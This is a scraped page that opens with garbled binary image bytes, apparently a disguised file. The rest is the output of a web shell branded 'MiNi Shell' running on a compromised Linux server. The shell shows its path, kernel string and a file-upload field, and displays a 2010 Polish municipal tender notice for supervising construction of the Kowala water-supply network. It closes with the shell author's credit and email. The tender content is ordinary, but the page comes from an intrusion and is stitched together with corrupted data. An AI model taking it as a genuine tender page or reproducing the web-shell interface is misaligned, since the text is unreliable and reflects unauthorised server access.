JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100714/186501-N-2010.html

<p class="kh_header"><b>Poniatowa: Prowadzenie nadzoru inwestorskiego nad realizacją Projektu: Budowa Wodociągu Kowala</b><br>
<b>Numer ogłoszenia: 186501 - 2010; data zamieszczenia: 14.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Poniatowa , ul. Młodzieżowa 2, 24-320 Poniatowa, woj. lubelskie, tel. 081 8204162 w. 15, faks 081 8203573.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.poniatowa.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie nadzoru inwestorskiego nad realizacją Projektu: Budowa Wodociągu Kowala.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowią usługi polegające na pełnieniu nadzoru inwestorskiego nad realizacją projektu: Budowa Wodociągu Kowala. realizowanego przy udziale środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich 2007-2013 w ramach działania 321 :Podstawowe usługi dla gospodarki i ludności wiejskiej. 

Realizacja zadania zaplanowana jest w dwóch etapach:
I ETAP: termin realizacji: 29 lipca 2011r.
II ETAP: termin realizacji 29 czerwca  2012r. - zakończenie całości zadania łącznie z rozruchem i przekazaniem inwestycji do eksploatacji.
Zamówienie obejmuje nadzór inwestorski nad realizacją całości zadania, t.j., obu etapów, w tym :

1) roboty sanitarne:
a) Wykonanie 15 767,0 m sieci wodociągowej , w tym:
DN200mm (Dz/Dw=200/176,2mm)		L=986,50 m
DN160mm (Dz/Dw=160/141,0mm)		L=6 362,50 m
DN110mm (Dz/Dw=110/96,8mm)		L=5 603,50 m
DN80mm (Dz/Dw=90/79,2mm)		L=1 592,50 m
DN50mm (Dz/Dw=50/44,0mm)		L=1 287,50 m
Sieć wodociągowa będzie wykonana z rur PEHD PE100, PN10 (bar) SDR17 łączonych za pomocą zgrzewania doczołowego. Węzły na sieci wykonane będą z kształtek żeliwnych kołnierzowych firmy Hawle. W węzłach zasuwy kołnierzowe firmy Hawle. Hydranty naziemne sztywne Hawle DN80. 

b) Wykonanie 5 748,50 m przyłączy wodociągowych, w tym:
DN50mm (Dz/Dw=50/44,0mm)		L=65,50 m		do 4 posesji
DN32mm (Dz/Dw=32/27,2mm)		L=5 579,00 m		do 296 posesji
DN80mm (Dz/Dw=90/79,2mm)		L=578,00 m		do 73 hydrantów
Przyłącza wodociągowe z rur PE, połączone z siecią za pomocą opaski HAKU do nawiercania produkcji Hawle dla odpowiednich średnic. Przyłącza wodociągowe uzbrojone w zasuwy i zakończone węzłem wodomierzowym z zaworem antyskażeniowym typu EA.
c) Wykonanie obiektu ujęcia wody i stacji uzdatniania wody - w szczególności:
- wykonanie poziomego rurociągu tłocznego wraz z głowicą i pozostałym uzbrojeniem dla dwóch  studni z kręgów żelbetowych, stanowiących ujęcie wody.
- budowa układu technologicznego  uzdatniania wody o wydajności 23,5 m3/h. Schemat technologiczny uzdatniania wody:
- aeracja ciśnieniowa,
- filtracja jednostopniowa,
- dezynfekcja wody roztworem podchlorynu sodu jako awaryjna w razie potrzeby dezynfekcji sieci,
- zbiorniki wyrównawcze,
- pompownia drugiego stopnia - zestaw hydroforowy,
- dezynfekcja (podstawowa) wody wtłaczanej do sieci urządzeniem UV.
d) wykonanie obiektów towarzyszących:
- Instalacja wodociągowa do budynku,
- Instalacja kanalizacji sanitarnej ze zbiornikiem bezodpływowym  ścieków sanitarnych,
- Odwodnienie placów manewrowych terenu stacji uzdatniania wody,
- Rurociąg wody surowej i rurociąg wody uzdatnionej, 
e) wykonanie rozruchu stacji uzdatniania wody wraz z badaniami wody wymaganymi przez Sanepid.

2) roboty ogólnobudowlane:
a) Budowa budynku stacji uzdatniania wody o wym. 1246x643 cm, o powierzchni 80,1 m2 i kubaturze 376,5 m3. Budynek parterowy,  zaprojektowany w technologii tradycyjnej- murowany. Strop i dach nad parterem o konstrukcji drewnianej typu belkowego. W budynku wydzielono pomieszczenia na : halę technologiczną, korytarz, pomieszczenie gospodarcze, w.c. i umywalnię, chlorownię, sterownię. Budynek wyposażony w instalacje wewnętrzne: wod-kan, ogrzewania, elektryczną i technologiczną.
b) Wykonanie obudowy dwóch  studni z kręgów żelbetowych, wewnątrz głowica studni, poziomy rurociąg tłoczny wraz z uzbrojeniem oraz urządzenia elektryczne. Ujecie wody stanowią dwie istniejące studnie wiercone, z których jedna pozostawać będzie jako awaryjna. Głębokość otworów studziennych wynosi 45 m p.p.t.
c) Wykonanie obiektów towarzyszących na terenie stacji uzdatniania wody:
- Zbiornik wodociągowy  2-komorowy cylindryczny o poj. 2x120m3, o konstrukcji żelbetowej,
- Odstojnik wód popłucznych  4-komorowy  z kręgów betonowych O1600mm.
- Osadnik ścieków (OB) 1- komorowy z kręgów żelbetowych O1600mm.
- Osadnik ścieków z chlorowni (SN) 1- komorowy z kręgów żelbetowych O1600mm.

d) Budowa ogrodzenia  terenu i dróg wewnętrznych na ujęciu i stacji uzdatniania wody. 
Teren ogrodzony siatką plecioną ocynkowaną  powlekaną , na słupkach stalowych z bramą wjazdową i furtką.
e) Uprzątnięcie i zagospodarowanie terenu SUW poprzez nawiezienie i rozrzucenie urodzajnej ziemi, nasianie trawy, dokonanie nasadzeń krzewów żywopłotowych iglastych i ozdobnych liściastych

3) roboty drogowe:
Budowa drogi dojazdowej do stacji uzdatniania wody, polegająca na: wykonaniu jezdni długości 150 m i  szerokości 5,0 m  z poszerzeniem  do 6,0 m na włączeniu do drogi powiatowej nr 2552L na podbudowie z kruszywa łamanego stabilizowanego mechanicznie o łącznej grubości 42 cm, warstwa wiążąca z betonu asfaltowego grubości 4 cm i warstwa ścieralna grubości 4 cm. Pobocza obustronne szerokości 0,75 m. Odwodnienie drogi poprzez odprowadzenie wód opadowych do istniejącego przepustu i rowu przy drodze powiatowej. Wykonania oznakowania pionowego i poziomego drogi.

4) roboty w zakresie instalacji elektrycznych:
Przyłącze energetyczne do budynku stacji wodociągowej, instalację elektryczną, instalację ogrzewania.
Urządzenia elektryczne dla ujęcia wody stanowiącego dwie studnie głębinowe oraz pozostałe roboty elektryczne na terenie stacji uzdatniania wody.

Wartości poszczególnych elementów robót zgodnie z oferta Wykonawcy robót umieszczono w formularzu cenowym stanowiącym Załącznik nr 2 do SIWZ.
Zamówienie obejmuje nadzór inwestorski nad całością projektu w branżach: sanitarnej, ogólnobudowlanej, drogowej i elektrycznej.
Wykonawca musi tworzyć zespół inspektorów posiadających następujące uprawnienia budowlane:
1.  uprawnienia budowlane do kierowania i nadzorowania robotami w specjalności instalacyjnej w zakresie sieci cieplnych,  wodociągowych i kanalizacyjnych 
2.  uprawnienia budowlane do kierowania i nadzorowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,  
3. uprawnienia budowlane do kierowania i nadzorowania robotami w specjalności konstrukcyjno - budowlanej,
4.  uprawnienia budowlane do kierowania i nadzorowania robotami w specjalności drogowej, 

Zaleca się , aby Wykonawcy dokonali wizji lokalnej na terenie objętym zamówieniem oraz zapoznali się z dokumentacją projektową. Dokumentacja projektowa budowy wodociągu Kowala dostępna jest w siedzibie Zamawiającego oraz na stronie internetowej www.um.poniatowa.pl/BIP w zakładce przetargi: Budowa Wodociągu Kowala.

Kody Wspólnego Słownika Zamówień:
71 24 70 00-1 Nadzór nad robotami budowlanymi.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz zrealizowanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, w okresie ostatnich trzech lat licząc od dnia złożenia oferty, a jeżeli okres działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi zostały należycie wykonane (załącznik nr 5 do SIWZ)
Wymagania minimalne: 
1.  Prowadzenie nadzoru inwestorskiego lub kierowanie robotami w specjalności instalacyjnej w zakresie sieci cieplnych,  wodociągowych i kanalizacyjnych  przy realizacji sieci wodociągowej z przyłączami lub sieci kanalizacji sanitarnej w technologii PE lub PCV długości min. 5 000,0m 
2. Prowadzenie nadzoru inwestorskiego lub kierowanie robotami w specjalności konstrukcyjno - budowlanej przy realizacji robót kubaturowych budynku o kubaturze min. 380 m3.
3. Prowadzenie nadzoru inwestorskiego lub kierowanie robotami w specjalności drogowej przy realizacji drogi  długości min. 150 m. 
4.  Prowadzenie nadzoru inwestorskiego lub kierowanie robotami  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych   przy realizacji robót elektrycznych o wartości min. 50 000,00 zł.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, niezależnie od tego, czy są one zatrudnione bezpośrednio przez wykonawcę wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
Wymagane:
-  osoba  posiadająca uprawnienia budowlane do kierowania i nadzorowania robotami w specjalności instalacyjnej w zakresie sieci cieplnych,  wodociągowych i kanalizacyjnych 
-osoba posiadająca  uprawnienia budowlane do kierowania i nadzorowania robotami w specjalności konstrukcyjno - budowlanej,
-  osoba posiadająca uprawnienia budowlane do kierowania i nadzorowania robotami w specjalności drogowej, 
-  osoba posiadająca uprawnienia budowlane do kierowania i nadzorowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,  określone przepisami ustawy Prawo budowlane.
Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia a także posiadają wpis do rejestru o którym mowa w art.12 ust.7 Prawa budowlanego (Załącznik nr 6 do SIWZ).

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.poniatowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Poniatowej
ul. Młodzieżowa 2
24-320 Poniatowa
pok. 204.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2010 godzina 13:00, miejsce: Urząd Miejski w Poniatowej
ul. Młodzieżowa 2
24-320 Poniatowa
Pokój nr 103 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane jest przy udziale środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich 2007-2013 w ramach działania 321 : Podstawowe usługi dla gospodarki i ludności wiejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com